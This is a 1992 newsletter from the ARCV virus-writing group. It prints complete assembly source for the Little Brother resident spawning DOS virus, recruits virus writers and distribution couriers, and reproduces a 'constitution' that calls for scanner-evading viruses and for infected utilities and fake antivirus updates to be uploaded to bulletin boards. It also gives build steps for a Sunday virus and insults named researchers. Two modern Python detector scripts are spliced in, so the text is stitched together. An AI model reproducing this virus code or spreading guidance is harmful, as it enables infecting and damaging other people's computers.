The Association of Really Cruel Viruses 001
Welcome to the first ARCV Newsletter....
We hope you are all having a Spiffing Time out there....
First let's introduce the 'Team'.
The Keyboard Basher - Apache Warrior.
The Other One - ICE-9.
Well you may or may not know that we here are one of the only Truly
English Computer Underground Organisations (And just to piss off the
Americans out there we will spell everything with an 's' not a 'z').
In this and future newsletters we will be dodging Special Branch and
New Scotland Yard as we go, as well as putting in the odd virus ASM
file, Debug Dump for you all to have fun with. We will also provide
information on what's happening (DUDE) out there in Computer Land.
Contents.
000..........................................................Contents.
001...................................Virus Spotlight, Little Brother.
002............................................ARCV Application Forms.
003.........................What is The ARCV, and Who are its Members.
004.....................................................Ontario Virus.
005......................................................Sunday Virus.
006...........................................................Closing.
The file in the Archive ARCVVIR.COM is a self displaying List of all
the ARCV Viruses we have produced. (Requires ANSI.SYS)
Greetings...To
The Guy Who Wrote CHAOS - Thanks Bud
The Guy Who Wrote FU MANCHU - Are you English?
Patti 'VSUM' Hoffman - We are here to make your Life HELL!
John McAfee - To Think if it wasn't for us you'd be Unemployed
The Guy Who Wrote MICHELANGELO - Get a LIFE!!!!!!!!!!!!!
Terry Pratchett - You Are COOOOOOOOL!
And Are Carnivorous Plants Really that Boring?
ARCV NEWS 001.
- Virus Spotlight -
Little Brother.
Now this virus is rather crafty, as it relies on good old MSDOS
program handling to work, i.e. the fact that .COM files are always loaded
before .EXE files. First let's see what Patti has to say.
Virus Name: Little Brother
Aliases:
V Status: Rare
Discovered: October, 1991
Symptoms: 307 byte .COM files
Origin: The Netherlands
Eff Length: 307 Bytes
Type Code: SRCE - Spawning Resident .EXE Infector
Detection Method: ViruScan, AVTK 5.54+, F-Prot 2.03+, Novi 1.1d+
Removal Instructions: Delete infected .COM programs
General Comments:
The Little Brother virus was submitted from the Netherlands in
October, 1991. This virus is a spawning virus similar in technique to the
Aids 2 and Twin-351 viruses.
The first time a program infected with Little Brother is executed,
Little Brother will become memory resident in a "hole" in low system memory
in the system data area, hooking interrupt 21. There will be no change in
total system or available free memory.
Once resident, the Little Brother virus will infect .EXE programs when
they are executed. The .EXE program itself will not be altered, but a
corresponding .COM program will be created by the virus of 307 bytes. This
corresponding .COM program will contain pure virus code and have a date/time
stamp in the DOS directory of when it was created. The following text
strings can be found in the 307 byte .COM files:
"Little Brother"
"EXE COM"
Since DOS will execute .COM programs before .EXE programs, whenever
the user attempts to execute a .EXE program, the corresponding .COM program
will be executed first. The .COM program, when finished will then start
the .EXE program the user was attempting to execute.
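A defender's check for the spawning behaviour described above, as an added example that is not part of the original newsletter: it walks a directory tree, reports any .COM file that shares a base name with a .EXE, and raises the verdict when the 307-byte length and the two text strings match. The function names, verdict labels and sample files are constructed for illustration; the generic same-name-pair check goes beyond this one virus.

```python
"""Find DOS 'companion' (spawning) files such as Little Brother's 307-byte .COM."""
import os
import tempfile
from dataclasses import dataclass
from typing import Optional

LB_SIZE = 307  # "Eff Length" in the VSUM entry above
# The listing stores the extensions as db 'EXE',0 and db 'COM',0, so the
# "EXE COM" string VSUM shows is NUL-separated on disk.
LB_MARKERS = (b"Little Brother", b"EXE\x00COM\x00")
MAX_COM = 0xFF00  # largest possible .COM image (64 KiB minus the 256-byte PSP)


@dataclass(frozen=True)
class Finding:
    com_path: str
    exe_path: Optional[str]  # None when the .COM has no same-name .EXE
    size: int
    verdict: str


def classify(data: bytes, size: int, has_exe: bool) -> Optional[str]:
    """Return a verdict label (labels are this example's own), or None."""
    has_markers = all(m in data for m in LB_MARKERS)
    if has_markers and size == LB_SIZE:
        return "little-brother"
    if has_markers:
        return "marker-only"       # strings present but length differs
    if has_exe and size == LB_SIZE:
        return "size-and-pair"     # right length beside an .EXE, no strings
    if has_exe:
        return "companion-pair"    # same-name .COM beside .EXE: review manually
    return None


def scan(root: str) -> list:
    """Walk root and return a Finding for every notable .COM file."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        by_stem = {}
        for name in files:
            stem, ext = os.path.splitext(name)
            # DOS names are case-insensitive, so compare in lower case.
            by_stem.setdefault(stem.lower(), {})[ext.lower()] = name
        for _stem, exts in sorted(by_stem.items()):
            if ".com" not in exts:
                continue
            com = os.path.join(dirpath, exts[".com"])
            exe = os.path.join(dirpath, exts[".exe"]) if ".exe" in exts else None
            size = os.path.getsize(com)
            with open(com, "rb") as fh:
                data = fh.read(MAX_COM)
            verdict = classify(data, size, exe is not None)
            if verdict:
                findings.append(Finding(com, exe, size, verdict))
    return findings


def demo() -> dict:
    """Run scan() over a constructed tree; the files are inert test data."""
    # Constructed stand-in: the two strings padded with zero bytes to 307 bytes.
    fake = LB_MARKERS[1] + b"\x00" * (LB_SIZE - 22) + LB_MARKERS[0]
    samples = {
        "GAME.EXE": b"MZ" + b"\x00" * 64,
        "GAME.COM": fake,             # length and strings match, .EXE beside it
        "EDIT.EXE": b"MZ" + b"\x00" * 64,
        "EDIT.COM": b"\xc3" * 1200,   # unrelated same-name pair
        "LONE.COM": fake,             # matching file with no .EXE sibling
        "TOOL.COM": b"\xc3" * 500,    # ordinary lone .COM, not reported
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(body)
        return {os.path.basename(f.com_path): f.verdict for f in scan(root)}


if __name__ == "__main__":
    for name, verdict in sorted(demo().items()):
        print(f"{name}: {verdict}")
```

A "companion-pair" verdict alone is only a prompt to look closer, since the check cannot tell an intentionally shipped same-name .COM from a spawned one.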
Well let's get to the Asm source.
---------------------------------------------------------------------------
cseg segment
assume cs:cseg,ds:cseg,es:nothing
org 100h
FILELEN equ quit - begin
RESPAR equ (FILELEN/16) + 17
VER_ION equ 1
oi21 equ quit
nameptr equ quit+4
DTA equ quit+8
.RADIX 16
;**************************************************************************
;* Start the program!
;**************************************************************************
begin: cld
mov ax,0DEDEh ;already installed?
int 21h
cmp ah,041h
je cancel
mov ax,0044h ;move program to empty hole
mov es,ax
mov di,0100h
mov si,di
mov cx,FILELEN
rep movsb
mov ds,cx ;get original int21 vector
mov si,0084h
mov di,offset oi21
movsw
movsw
push es ;set vector to new handler
pop ds
mov dx,offset ni21
mov ax,2521h
int 21h
cancel: ret
;**************************************************************************
;* File-extensions
;**************************************************************************
EXE_txt db 'EXE',0
COM_txt db 'COM',0
;**************************************************************************
;* Interupt handler 24
;**************************************************************************
ni24: mov al,03
iret
;**************************************************************************
;* Interupt handler 21
;**************************************************************************
ni21: pushf
cmp ax,0DEDEh ;install-check ?
je do_DEDE
push dx
push bx
push ax
push ds
push es
cmp ax,4B00h ;execute ?
jne exit
doit: call infect
exit: pop es
pop ds
pop ax
pop bx
pop dx
popf
jmp dword ptr cs:[oi21] ;call to old int-handler
do_DEDE: mov ax,04100h+VER_ION ;return a signature
popf
iret
;**************************************************************************
;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
;**************************************************************************
infect: cld
mov word ptr cs:[nameptr],dx ;save the ptr to the
;filename
mov word ptr cs:[nameptr+2],ds
push cs ;set new DTA
pop ds
mov dx,offset DTA
mov ah,1Ah
int 21
call searchpoint
mov si,offset EXE_txt ;is extension 'EXE'?
mov cx,3
rep cmpsb
jnz do_com
do_exe: mov si,offset COM_txt ;change extension to COM
call change_ext
mov ax,3300h ;get ctrl-break flag
int 21
push dx
xor dl,dl ;clear the flag
mov ax,3301h
int 21
mov ax,3524h ;get int24 vector
int 21
push bx
push es
push cs ;set int24 vec to new handler
pop ds
mov dx,offset ni24
mov ax,2524h
int 21
lds dx,dword ptr [nameptr] ;create the file (unique
;name)
xor cx,cx
mov ah,5Bh
int 21
jc return1
xchg bx,ax ;save handle
push cs
pop ds
mov cx,FILELEN ;write the file
mov dx,offset begin
mov ah,40h
int 21
cmp ax,cx
pushf
mov ah,3Eh ;close the file
int 21
popf
jz return1 ;all bytes written?
lds dx,dword ptr [nameptr] ;delete the file
mov ah,41h
int 21
return1: pop ds ;restore int24 vector
pop dx
mov ax,2524h
int 21
pop dx ;restore ctrl-break flag
mov ax,3301h
int 21
mov si,offset EXE_txt ;change extension to EXE
call change_ext
return: ret
do_com: call findfirst ;is the file a virus?
cmp word ptr cs:[DTA+1Ah],FILELEN
jne return
mov si,offset EXE_txt ;does the EXE-variant
exist?
call change_ext
call findfirst
jnc return
mov si,offset COM_txt ;change extension to COM
jmp short change_ext
;**************************************************************************
;* Find the file
;**************************************************************************
findfirst: lds dx,dword ptr [nameptr]
mov cl,27h
mov ah,4Eh
int 21
ret
;**************************************************************************
;* change the extension of the filename (CS:SI -> ext)
;**************************************************************************
change_ext: call searchpoint
push cs
pop ds
movsw
movsw
ret
;**************************************************************************
;* search begin of extension
;**************************************************************************
searchpoint: les di,dword ptr cs:[nameptr]
mov ch,0FFh
mov al,'.'
repnz scasb
ret
;**************************************************************************
;* Text and Signature
;**************************************************************************
db 'Little Brother',0
quit:
cseg ends
end begin
Quite a Simple idea for a virus but it works.
Apache.
ARCV NEWS 002.
Well I thought it could be a good idea if I put in the relevant ARCV
Application forms for anyone who may wish to join the ranks of the ARCV.
At the moment we are looking for MAC Virus programmers, and AMIGA Virus
Programmers and others. Also we are looking for Couriers for the ARCV (BBS's
for Distribution), that are based all over the world, in Britain, USA and
Eastern Europe mainly, but other countries will get equal consideration. So
less of the waffle and on to the Applications.
---------------------------------------------------------------------------
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
/////// //////// ///////// // //
// // // // // // //
/////// /////// // // //
// // // // // // //
// // * // // * ///////// * ///
THE
ASSOCIATION
OF REALLY
CRUEL
VIRUSES
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
The Association of Really Cruel Viruses
Courier and/or Membership Application Form
For any purpose other than to evaluate this application, the data in all
sections of this application shall not be disclosed outside the internal
leadership of the ARCV. For more ARCV information please see ARCV
prologue.
---------------------------------------------------------------------------
FALSE STATEMENT: A person is guilty of False Statement when he/she
Intentionally makes a false statement under oath or
pursuant to a form bearing Notice.
You are here to fore-warned...
FALSE STATEMENTS SHALL NOT BE MADE ON THIS FORM!!!
---------------------------------------------------------------------------
PART A: Background Information
1. Date of Application:__________________________________
2. Applicants Name (Last,First,Middle,Maiden):
______________________________________________________
3. Applicants Current Handle:____________________________
4. List all other Handles by which you have been known.
______________________________________________________
______________________________________________________
5. Residence Address (Number,Street,City or Town,County and Post Code):
_______________________________________________________
_______________________________________________________
_______________________________________________________
6. Home Telephone Number (Area Code and Number):
_______________________________________________________
7. Home Data Number (Area Code and Number):
_______________________________________________________
8. Fidonet Contact address (full address, including name to contact):
_______________________________________________________
_______________________________________________________
9. Age:__________ Date of Birth:_________________________
10. Marital Status: ___ Married ___ Separated
___ Single ___ Divorced
11. Nationality __________________________________________
12. Have you at any time used a virus? YES/NO ____________
If Yes, explain: _____________________________________
______________________________________________________
______________________________________________________
13. Have you at any time been the victim of a virus attack?
YES/NO _________________
If yes, explain: _____________________________________
______________________________________________________
______________________________________________________
Part B: Legal Information
1. Have You ever been convicted in any court of a crime
punishable by imprisonment for a term exceeding 1 year?
No _____
Yes ____ If yes, explain: _____________________________
_______________________________________________________
_______________________________________________________
2. Are you currently on Probation,Parole,a Work-Release Program
or Released on Personal Recognizance or Bond Pending Court Action?
No _____
Yes ____ If yes, explain: ______________________________
_______________________________________________________
_______________________________________________________
3. Are you Now or ever have been a member of any form of
Law Enforcement Agency, Such as: FBI,Secret Service,NSA,
CIA,BATF,State or Local Police,Special Branch etc.?
No _____
Yes ____ If yes, explain: _____________________________
_______________________________________________________
_______________________________________________________
4. Are you Now or ever have been a member of any form of
group that investigates the Computer Underground?
Such as: Software Publishers Association,etc.
No _____
Yes ____ If yes, explain: _____________________________
_______________________________________________________
_______________________________________________________
5. Do you belong To any Organized Computer Club or Group?
No _____
Yes ____ If yes, explain: _____________________________
_______________________________________________________
_______________________________________________________
Part C: ARCV Information
1. Are you applying to be:
An ARCV Member __________
An ARCV Courier __________
Both __________
2. If applying to be a member, Explain in detail your reason for wanting
to be a member of the ARCV.
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
3. What kind of position do you wish to hold in the ARCV?
____________________________________________________________________
____________________________________________________________________
____________________________________________________________________
Part D: Qualifications
1. Which Programming languages do you know WELL? (Place X in Boxes)
[ ] Assembler
[ ] Basic
[ ] Cobol
[ ] C (Turbo, Ansi)
[ ] Fortran
[ ] Pascal (Turbo, Others)
2. Which Programming languages are you familiar with? (Place X in Boxes)
[ ] Assembler
[ ] Basic
[ ] Cobol
[ ] C (Turbo, Ansi)
[ ] Fortran
[ ] Pascal (Turbo, Others)
3. Have you ever written a virus? (No Trojans Please)
No _______
Yes ______ If yes, explain: ___________________________
_______________________________________________________
_______________________________________________________
_______________________________________________________
4. If you answered NO to the above DON'T answer this...
Is the virus you've written in the Public Domain?
(ie. Is it released?)
No _______
Yes ______ If yes, explain: ___________________________
_______________________________________________________
_______________________________________________________
_______________________________________________________
5. If you've written a virus are you willing for it to be placed in our
virus library?
No _______
Yes ______
6. Do you have a virus collection?
No _______
Yes ______ If yes, explain (Please include number in collection)
_______________________________________________________
_______________________________________________________
_______________________________________________________
________________________________________________________
ARCV By-Laws:
---------------------------------------------------------------------------
Section 1A-1
ALL MEMBERS OF THE ARCV MUST SUBSCRIBE TO THE HACKERS ETHIC AS DEFINED
BY THE EARLY CRAFTERS OF THE ART. (See Appendix A) ALSO YOU MUST SUBSCRIBE
TO THE VIRUS WRITERS CONSTITUTION. (See Appendix B)
---------------------------------------------------------------------------
Section 1a-2
DEFENSE OF COPARTICIPANTS IN OFFENSE WITH A COMPUTER
In any prosecution for any Crime under Law, in which the member was not
the only participant, it shall be recognized that no ARCV
member shall provide information on any current ARCV member to any
member of the Media or Law Enforcement Agencies.
---------------------------------------------------------------------------
Section 1a-3
USE OF DEADLY HACKING FORCE
Except as provided in these sub-sections, No ARCV member shall ever damage
delete or in any way tamper with a computer network or system.
Exception 1a-3-1 : Any BBS or system posting or providing Anti-ARCV
propaganda may be crashed or deleted.
Exception 1a-3-2 : Any BBS or system posting or providing any ARCV members
phone numbers,Password, or personal information may be
crashed or deleted.
Exception 1a-3-3 : Any system so approved by the ARCV Council.
---------------------------------------------------------------------------
Section 1a-4
DISCLOSURE OF PROPRIETARY INFORMATION
No ARCV member shall distribute confidential ARCV information.
This shall include: Disks,Programs,Files,Passwords or Codes,Paperwork,
Manuals,Documents to any Non ARCV member,Media Member, or Law Enforcement
Agency, Without the prior permission of the ARCV Council.
---------------------------------------------------------------------------
Section 1a-5
CONTRIBUTION OF INFORMATION
All ARCV Members are expected to contribute to the ARCV as a whole, and
to provide information obtained on their own. Members shall not just
use information provided by other members or non-members.
---------------------------------------------------------------------------
Section 1a-6
DISCLOSURE OF MEMBERSHIP
All ARCV members will not allow any Non-member to use his/her password,
ID,Handle or name. And No member shall post or provide any members name
password or phone number on any computer system without the prior consent
of said member. All members will leave his/her name or phone number on a
system or network at their own discretion and risk.
---------------------------------------------------------------------------
APPENDIX A:
1. All Information should be FREE!
2. Promote Decentralization - Mistrust Authority
3. Access to computers should be unlimited and Total
4. Hackers should be judged by their hacking ability
5. You can create art and beauty on a computer
6. Computers can change your life for the better.
___________________________________________________________________________
APPENDIX B: ***
-------------------------------------------
The Constitution of Worldwide Virus Writers
-------------------------------------------
Initial Release - February 12, 1992
-------------------------------------------
ARTICLE I - REGARDING ORIGINAL VIRII
Section A - DEFINITION
The term "original virus" herein indicates programming done
exclusively by either one individual or group, with no code
taken from any other source, be it a book or another virus.
Section B - CODE REQUIREMENTS
For an original virus to conform to the standards set by
this document, it must include the following:
1) The title of the virus in square brackets followed by a
zero byte should be in the code, in a form suitable for
inclusion into SCAN(1). This is to ensure that the
name of the virus is known to those examining it.
2) The name of the author and his/her group affiliation/s
should be included in the code, followed by a zero
byte. At the present, this is an optional requirement.
3) Some form of encryption or other form of stealth
techniques must be used. Even a simple XOR routine
will suffice.
4) If the virus infects files, the code should be able to
handle infection of read only files.
5) It must have some feature to distinguish it from other
virii. Creativity is encouraged above all else.
6) The virus must not be detectable by SCAN.
Section C - IMPLEMENTATION
This section, and all sections hereafter bearing the heading
"IMPLEMENTATION" refer to the recommended method of
implementation of the suggestions/requirements listed in the
current article.
1) Virus_Name db '[Avocado]',0
2) Author db 'Dark Angel, PHALCON/SKISM',0
ARTICLE II - REGARDING "HACKED" VIRII
Section A - DEFINITION
The term "hacked virus" herein refers to any virus written
by either one individual or a group which includes code
taken from any other source, be it a book, a code fragment,
or the entire source code from another virus.
The term "source virus" herein refers to the virus which
spawned the "hacked virus."
Section B - CODE REQUIREMENTS
For a "hacked" virus to conform to the standards set forth
by this document, it must include the following, in addition
to all the requirements set down in Article I of this
document:
1) The title, author (if available), and affiliation of
the author (if available) of the original virus.
2) The author of the hacked virus must give the source
code of said virus to the author of the source virus
upon demand.
3) No more Jerusalem, Burger, Vienna, Stoned, and Dark
Avenger hacks are to be written.
4) The source virus must be improved in some manner
(generally in efficiency of speed or size).
5) The hacked virus must significantly differ from the
source virus, i.e. it cannot be simply a text change.
Section C - IMPLEMENTATION
1) Credit db 'Source stolen from Avocado by Dark Angel of
PHALCON/SKISM',0
ARTICLE III - REGARDING VIRAL STRAINS
Section A - DEFINITION
The term "viral strain" herein refers to any virus written
by the original author which does not significantly differ
from the original. It generally implies a shrinking in code
size, although this is not required.
Section B - CODE REQUIREMENTS
For a "viral strain" to conform to the standards set by this
document, it must include the following, in addition to all
the requirements set down in Article I of this document:
1) The name of the virus shall be denoted by the name of
the original virus followed by a dash and the version
letter.
2) The name of the virus must not change from that of the
original strain.
3) A maximum of two strains of the virus can be written.
Section C - IMPLEMENTATION
1) Virus_Name db '[Avocado-B]',0
ARTICLE IV - DISTRIBUTION
Section A - DEFINITION
The term "distribution" herein refers to the transport of
the virus through an infected file to the medium of storage
of a third (unwitting) party.
Section B - INFECTION MEDIUM
The distributor shall infect a file with the virus before
uploading. Suggested files include:
1) Newly released utility programs.
2) "Hacked" versions of popular anti-viral software, i.e.
the version number should be changed, but little else.
3) Beta versions of any program.
The infected file, which must actually do something useful,
will then be uploaded to a board. The following boards are
fair game:
1) PD Boards
2) Lamer boards
3) Boards where the sysop is a dick
No virus shall ever be uploaded, especially by the author,
directly to an antivirus board, such as HomeBase or
Excalibur.
Section C - BINARY AND SOURCE CODE AVAILABILITY
The binary of the virus shall not be made available until at
least two weeks after the initial (illicit) distribution of
the virus. Further, the source code, which need not be made
available, cannot be released until the latest version of
SCAN detects the virus. The source code, should it be made
available, should be written in English.
Section D - DOCUMENTATION
Documentation can be included with the archive containing
the binary of the virus, although this is optional. The
author should include information about the virus suitable
for inclusion in the header of VSUM(2). A simple
description will follow, though the author need not reveal
any "hidden features" of the virus. Note this serves two
purposes:
1) Enable others to effectively spread the virus without
fear of self-infection.
2) Ensure that your virus gets a proper listing in VSUM.
ARTICLE V - AMENDMENTS
Section A - PROCEDURE
To propose an amendment, you must first contact a
PHALCON/SKISM member through one of our member boards.
Leave a message to one of us explaining the proposed change.
It will then be considered for inclusion. A new copy of the
Constitution will then be drafted and placed on member
boards under the filename "PS-CONST.TXT" available for free
download by all virus writers. Additionally, an updated
version of the constitution will be published periodically
in our newsletter.
Section B - AMENDMENTS
None as of this writing.
ARTICLE VI - MISCELLANEOUS
Section A - WHO YOU CAN MAKE FUN OF
This is a list of people who, over the past few years, have
proved themselves to be inept and open to ridicule.
1) Ross M. Greenberg, author of FluShot+
2) Patricia (What's VSUM?) Hoffman.
2) People who post "I am infected by Jerusalem, what do I
do?" or "I have 20 virii, let's trade!"
3) People who don't know the difference between a virus
and a trojan.
4) Lamers and "microwares puppies"
Section B - WHO YOU SHOULDN'T DIS TOO BADLY
This is a list of people who, over the past few years, have
proved themselves to be somewhat less inept and open to
ridicule than most.
1) John McAfee, nonauthor of SCAN
2) Dennis, true author of SCAN
Section C - MOTIVATION
In most cases, the motivation for writing a virus should not
be the pleasure of seeing someone else's system trashed, but
to test one's programming abilities.
----------
1 SCAN is a registered trademark of McAfee Associates.
2 VSUM is a registered trademark of that bitch who doesn't know her own
name.
___________________________________________________________________________
For those applying for courier membership, if we feel you are suitable we
will be in touch to discuss the extra details. The usual first contact
will be by means of a Fidonet address or a written letter.
For those applying for normal membership, we will contact you at your
Fidonet address, with the extra details of the membership and a list of
boards that we can be contacted through.
___________________________________________________________________________
FALSE STATEMENT: A person is guilty of False Statement when he/she
Intentionally makes a false statement under oath or
pursuant to a form bearing Notice.
You are here to fore-warned...
FALSE STATEMENTS SHALL NOT BE MADE ON THIS FORM!!!
I agree to the By-Laws and statements put forth on this document
NAME: _______________________________
DATE: _______________________________
To return your Application please return to Apache Warrior. Through E-
Mail on any Flashback BBS or the BBS where you got this from.
Please fill in the Machine Configuration data sheet and return to the
above address.
***
PS. Thanks to PHALCON/SKISM for preparing the Virus Writers Constitution.
***
---------------------------------------------------------------------------
The ARCV'92
May the Great A'Tuin keep going........
---------------------------------------------------------------------------
Well that's the Application form next is the machine spec. form. This
gives us an indication of the kind of computer system you run.
---------------------------------------------------------------------------
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
/////// //////// ///////// // //
// // // // // // //
/////// /////// // // //
// // // // // // //
// // * // // * ///////// * ///
THE
ASSOCIATION
OF REALLY
CRUEL
VIRUSES
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
The Association of Really Cruel Viruses.
Machine Configuration Form.
Please fill in all the questions truthfully as they will help us decide
what you can offer our group.
___________________________________________________________________________
1. Date of Application:__________________________________
2. Applicants Name (Last,First,Middle,Maiden):
______________________________________________________
3. Applicants Current Handle:____________________________
4. Machine Type. (Place an X in the boxes appropriate)
[ ] IBM PC.
[ ] AMIGA.
[ ] ATARI ST.
[ ] MAC.
[ ] ARCHIMEDES.
[ ] OTHER, (Please State).
5. If you answered IBM PC to the above please answer below. What type
of IBM PC do you have.
[ ] 8086/88 Based
[ ] 80286 Based
[ ] 80386 (SX/DX) Based
[ ] 80486 (SX/DX/DX2) Based
[ ] PS/2
6. If you have a machine other than that of an IBM PC please state
processor type and manufacturer.
_______________________________________________________________
_______________________________________________________________
_______________________________________________________________
7. Do you have any of the following equipment.
[ ] Hard Disk, enter size and type: ______________________________
______________________________________________________________
[ ] Modem, enter model and max speed: ____________________________
______________________________________________________________
[ ] Printer
[ ] 9 pin Dot Matrix
[ ] 24 pin Dot Matrix
[ ] Laser Printer
[ ] Ink Jet type
[ ] Colour
[ ] Monochrome Display.
[ ] CGA Display, or equivalent.
[ ] EGA Display, or equivalent.
[ ] VGA Display, or equivalent.
[ ] SVGA Display, or equivalent.
[ ] 5¼ inch 360K floppy.
[ ] 5¼ inch 1.2Mb floppy.
[ ] 3½ inch 720Kb floppy.
[ ] 3½ inch 1.44Mb floppy.
[ ] Other Please State: __________________________________________
8. What Kind of Anti-Virus Software do you use:
_______________________________________________________________
_______________________________________________________________
9. Do you believe in Virus Research? YES/NO _______________________
10. Do you Hack? YES/NO ___________________________________________
11. If so what kind of Systems? ___________________________________
_______________________________________________________________
12. Do you run a BBS? YES/NO ______________________________________
13. If so please state BBS configuration. inc. Software, Machines.
_______________________________________________________________
_______________________________________________________________
_______________________________________________________________
_______________________________________________________________
_______________________________________________________________
14. If you have a BBS are you willing for us to use it? YES/NO _____
___________________________________________________________________________
This is all for now and we may ask further questions regarding your computer
setups. Thank you for your time.
___________________________________________________________________________
FALSE STATEMENT: A person is guilty of False Statement when he/she
Intentionally makes a false statement under oath or
pursuant to a form bearing Notice.
You are here to fore-warned...
FALSE STATEMENTS SHALL NOT BE MADE ON THIS FORM!!!
I agree to the statements put forth on this document
NAME: _______________________________
DATE: _______________________________
To return your Machine Configuration data sheet please return to Apache
Warrior. Through E-Mail on any Flashback BBS or the BBS where you got this
from.
---------------------------------------------------------------------------
The ARCV'92
Octarine - The Pigment of Imagination......
---------------------------------------------------------------------------
ARCV NEWS 003.
The Association of Really Cruel Viruses.
This is one of the first English Computer Underground groups. Although
we are an English organisation, we can only be contacted through American or
Eastern Europe Virus boards, or we will contact you through a Fidonet address.
What is The ARCV.
ARCV is an organisation that is involved in the Writing and Research of
computer viruses. We hold a Library of IBM Computer viruses for the use of
the ARCV members. But as a group we are involved in viruses for most of the
main computer types (IBM PC, AMIGA, ST, MAC). We have a Bi-Monthly
newsletter with the latest virus news from around the country and from
around the world, virus Dis-Assemblies and other virus Debug Scripts. We
have links with PHALCON/SKISM in the US, we also have links with some
Eastern Europe Virus writers. Our group is not only limited to virus
activities but other 'Underground' activities also (Hacking, Phreaking
etc.) so any new members who don't write viruses could be involved in any
of the other activities we are involved in.
Are members come from the youths of today, at the moment we are mainly
English students that wish to beat and know more about the system. We come
from a range of backgrounds from the Electronics side and the Computer
side, I myself Apache Warrior come mainly from the Electronics side but
branched to the Computer side fully around 2 years ago. I Hack, Phreak and
write Viruses, I am the President of the group (after all I started the
group) and I am somewhat of an expert on beating the BT phone exchange and
being a BBS A HOLIC that comes in very handy. Now ICE-9 is also an
Electronics guy who turned to the computer; he writes viruses and is into
Heavy Metal. Now the picture put out by the Anti-Virus Authors is that
Virus writers are Sad individuals who wear Anoraks and go Train Spotting
but well they are sadly mistaken, we are very intelligent, sound minded,
highly trained, and we wouldn't be seen in an Anorak or near an Anorak even
if dead.
We aim to provide the ARCV members and some Non-Members an insight to
the computer underground world and would you believe it is huge. The Group
is always seeking new members and we require new members to stay afloat,
soon we will be opening the world HQ in the UK this will have special
access areas for the ARCV members these will include access to the ARCV
Virus Library, all of which are legit viruses and No Trojans.
ARCV NEWS 004.
The Ontario Virus
Well here's a virus from Canada.
V Status: Rare
Discovered: July, 1990
Symptoms: .COM & .EXE growth; decrease in system and free memory;
hard disk errors in the case of extreme infections
Origin: Ontario, Canada
Eff Length: 512 Bytes
Type Code: PRtAK - Parasitic Encrypted Resident .COM & .EXE Infector
Detection Method: ViruScan V66+, Pro-Scan 2.01+, NAV
Removal Instructions: SCAN /D, or Delete infected files
General Comments:
The Ontario Virus was isolated by Mike Shields in Ontario, Canada in
July, 1990. The Ontario virus is a memory resident infector of .COM,
.EXE, and overlay files. It will infect COMMAND.COM.
The first time a program infected with the Ontario Virus is executed,
it will install itself memory resident above the top of system memory
but below the 640K DOS boundary. Total system memory and free memory
will be decreased by 2,048 bytes. At this time, the virus will infect
COMMAND.COM on the C: drive, increasing its length by 512 bytes.
Each time an uninfected program is executed on the system with the
virus memory resident, the program will become infected with the viral
code located at the end of the file. For .COM files, they will
increase by 512 bytes in all cases. For .EXE and overlay files, the
file length increase will be 512 - 1023 bytes. The difference in
length for .EXE and overlay files is because the virus will fill out
the unused space at the end of the last sector of the uninfected file
with random data (usually a portion of the directory) and then append
itself to the end of the file at the next sector. Systems using a
sector size of more than 512 bytes may notice larger file increases
for infected files. Infected files will always have a file length
that is a multiple of the sector size on the disk.
In the case of extreme infections of the Ontario Virus, hard disk
errors may be noticed.
Ontario uses a complex encryption routine, and a simple identification
string will not identify this virus.
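Because a fixed identification string will not find this virus, the size changes described above are the practical thing to check: compare current file lengths against a known-clean baseline and flag growth that fits the pattern exactly. The Python below is an added example, not part of the original newsletter or the quoted description; the file names and sizes are constructed, and the 512-byte sector size is an assumption taken from the figures in the description.

```python
import os

VIRUS_LEN = 512  # "Eff Length" from the description
SECTOR = 512     # assumed sector size; the description's figures use 512


def expected_infected_size(clean_size, name):
    """Length a clean file would have after infection, per the description."""
    if os.path.splitext(name)[1].upper() == ".COM":
        return clean_size + VIRUS_LEN           # .COM: always +512
    # .EXE/overlay: the last sector is padded out and the body is
    # appended at the next sector boundary (growth of 512 to 1023 bytes).
    padded = -(-clean_size // SECTOR) * SECTOR  # round up to a sector boundary
    return padded + VIRUS_LEN


def flag_growth(baseline, current):
    """Return (name, old, new, growth) for files whose growth fits the pattern."""
    hits = []
    for name in sorted(baseline):
        old, new = baseline[name], current.get(name)
        if new is None or new == old:
            continue                            # missing or unchanged
        if new == expected_infected_size(old, name):
            hits.append((name, old, new, new - old))
    return hits


# Constructed sample data: sizes recorded on a clean system vs. sizes now.
BASELINE = {"COMMAND.COM": 47845, "FORMAT.EXE": 32911, "SORT.EXE": 6144,
            "CHKDSK.EXE": 16200, "MORE.COM": 2618}
CURRENT = {"COMMAND.COM": 48357, "FORMAT.EXE": 33792, "SORT.EXE": 6656,
           "CHKDSK.EXE": 16300, "MORE.COM": 2618}

if __name__ == "__main__":
    for name, old, new, growth in flag_growth(BASELINE, CURRENT):
        print(f"{name}: {old} -> {new} (+{growth} bytes) fits the Ontario pattern")
```

A match is only an indicator: a file that grew by 100 bytes (CHKDSK.EXE in the sample) is not flagged, and a flagged file still needs confirmation with a scanner.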
---------------------------------------------------------------------------
Apache..
ARCV NEWS 005.
The Sunday Virus
According to Patty Hoffman, the Sunday virus is based on the Jerusalem
viruses, because the codes for both viruses are similar. Sunday infects
COM, EXE, and OVL files, when they are executed, and it stays resident in
memory. It was circulated around the Seattle, Washington area in 1989, and
is very common.
However this version of Sunday doesn't seem to print any messages on
the screen, like some of the other versions do, every Sunday. This virus
spreads rapidly, and is a great replicator.
To create SUNDAY.COM, cut out the following code, and name the
resulting file sunday.scr. Then, use this command: DEBUG < SUNDAY.SCR
this will then produce the .COM all ready for use.
---------------------------------------------------------------------------
ARCV NEWS 006.
Closing.
